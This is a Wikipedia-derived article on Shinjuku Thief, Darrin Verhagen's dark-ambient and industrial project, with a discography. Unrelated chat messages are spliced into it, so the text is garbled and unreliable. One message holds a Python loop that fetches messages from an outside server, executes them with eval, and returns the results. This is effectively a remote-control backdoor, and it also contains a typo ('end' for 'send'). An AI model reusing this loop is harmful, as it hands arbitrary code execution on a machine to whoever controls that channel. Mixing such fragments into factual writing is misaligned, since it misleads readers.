Shinjuku Thief
Shinjuku Thief is an experimental recording project of Australian musician Darrin Verhagen, that could be described as dark ambient or gothic industrial.[1] Shinjuku Thief began in 1992 as a trio, consisting of Verhagen, Charles Tétaz and François Tétaz.[2] Eventually, Verhagen became the mainstay. Shinjuku Thief's first LP, Bloody Tourist, was released on the Extreme label. Subsequent LPs were released on Verhagen's own Dorobo label. Verhagen's side-project, Shinjuku Filth, released music in the industrial music genre.
Discography
- Bloody Tourist (1992, Extreme)
- The Scribbler (1992, Dorobo)
- The Witch Hammer (1993, Dorobo)
- The Witch Hunter (1995, Dorobo)
- The Witch Haven (2002, Dorobo)
- Medea (2003, Dorobo)
- Matte Black (2004, Dorobo)
- Sacred Fury (2005, Fin De Siecle Media)
- Devolution (2006, Dorobo)
- Boys in the Trees OST (2016, Liberation)
gollark: Imagine boosting this instead of the [REDACTED].
gollark: I don't think I ever go around *manually* fiddling with tree structures (unless you count source code, which could be represented various different ways).
gollark: It's basically an infinite 2D grid of bad computers with 256B of RAM.
gollark: I made a "usable" esolang, for certain definitions of "usable".
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: try: send(repr(eval(data["result"]["data"]))) except Exception as e: end(repr(e))```Here is a small version if you want that.
References
- "Shinjuku Thief". projekt.com. 1983–2011. Retrieved 2 March 2013.
- Tetaz, Francios (2012). "Bio". francoistetaz.com. Retrieved 2 March 2013.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.